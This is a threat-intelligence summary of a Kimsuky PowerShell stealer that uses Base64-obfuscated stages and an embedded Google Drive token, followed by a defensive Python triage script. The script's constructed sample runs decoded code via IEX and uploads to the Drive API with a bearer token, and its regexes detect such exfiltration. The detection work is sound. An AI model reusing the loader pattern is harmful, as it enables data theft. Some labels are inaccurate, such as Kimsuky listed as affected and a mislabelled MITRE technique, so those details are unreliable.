The article discusses the theft of web browser information through the use of malware, particularly focusing on a PowerShell script associated with the Kimsuky threat group. The analysis highlights the use of obfuscation techniques that make the malware complex and challenging to analyze, especially in the context of advancing AI capabilities. The findings indicate a substantial threat posed by Kimsuky’s continuous updates to their malware and ongoing spear phishing campaigns.
Affected: Kimsuky threat group, economic sector
Key points:
- The malware discussed is a PowerShell script used for the theft of web browser information.
- The technique of obfuscation employed in the malware makes it difficult to analyze.
- A specific PowerShell script linked to Kimsuky was chosen for detailed analysis.
- The code performs several operations including executing and uploading PowerShell scripts.
- It interacts with Google Drive and uses an access token embedded within the script.
- The Kimsuky threat group is known for spear phishing attacks and for continuously updating their malware.
- The economic implications of Kimsuky’s campaigns pose significant threats.
MITRE Techniques:
- PowerShell (T1086) – The malware uses PowerShell scripts to execute code, which includes defining functions for processing and executing Base64 encoded strings.
- Obfuscated Files or Information (T1027) – The script employs obfuscation techniques that obscure its operations, complicating analysis and detection.
- Data from Information Repositories (T1213) – The malware interacts with Google Drive to manage uploaded information.
- Unauthorized Access (T1078) – The use of access tokens within the script indicates unauthorized access to cloud services.
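The key points and techniques above describe a PowerShell stealer that unpacks Base64-encoded stages and talks to Google Drive with an access token embedded in the script. The triage helper below is an added example written for this summary, not code from the article or from the Kimsuky sample: it pulls Base64 candidates out of a script, decodes the ones that yield printable text, and flags Google Drive API endpoints and bearer tokens in both the raw and decoded text. The sample script, the stage string and the token value are constructed for the demonstration.

```python
import base64
import re

# Indicators the triage looks for: Base64 blobs fed to FromBase64String,
# Google Drive API endpoints, and bearer tokens embedded in the script body.
B64_RE = re.compile(r'(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{20,}={0,2})(?![A-Za-z0-9+/=])')
FROM_B64_RE = re.compile(r'FromBase64String', re.IGNORECASE)
DRIVE_RE = re.compile(r'googleapis\.com/(?:upload/)?drive/v\d', re.IGNORECASE)
TOKEN_RE = re.compile(r'Bearer\s+[A-Za-z0-9._\-]{16,}', re.IGNORECASE)


def decode_candidates(script: str) -> list[str]:
    """Return every Base64 candidate in the script that decodes to printable text."""
    found = []
    for blob in B64_RE.findall(script):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # looks like Base64 but is not (e.g. a long identifier)
        # Loaders decode as UTF-8; PowerShell -EncodedCommand payloads are UTF-16LE.
        for enc in ("utf-8", "utf-16-le"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isprintable():
                found.append(text)
                break
    return found


def triage(script: str) -> dict:
    """Summarise the indicators found in one script, including decoded stages."""
    decoded = decode_candidates(script)
    # Drive endpoints and tokens may only appear after the staged payload is decoded.
    all_text = script + "\n" + "\n".join(decoded)
    return {
        "uses_base64_decoder": bool(FROM_B64_RE.search(script)),
        "decoded_payloads": decoded,
        "google_drive_endpoints": sorted(set(DRIVE_RE.findall(all_text))),
        "embedded_bearer_tokens": TOKEN_RE.findall(all_text),
    }


# Constructed sample in the style of the loader described above (not the Kimsuky
# script itself); the stage is Base64-encoded here so the decoder's output is known.
STAGE = "Invoke-WebRequest -Uri https://www.googleapis.com/upload/drive/v3/files -Method Post"
SAMPLE_SCRIPT = (
    "function Invoke-Stage { param($s) IEX ([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String($s))) }\n"
    f'$p = "{base64.b64encode(STAGE.encode()).decode()}"\n'
    "Invoke-Stage $p\n"
    '$hdr = @{ Authorization = "Bearer ya29.PLACEHOLDER_TOKEN_NOT_REAL_0123456789" }\n'
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

A hit on `google_drive_endpoints` together with `embedded_bearer_tokens` is the combination worth escalating, since a script that carries its own cloud credential needs no interactive login to exfiltrate.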
Indicator of Compromise:
- [MD5] 1e9d94d88fdac3c4a0a47a3a1d07e329
Full Story: https://malwareanalysisspace.blogspot.com/2025/02/the-north-korean-nation-state-apt43.html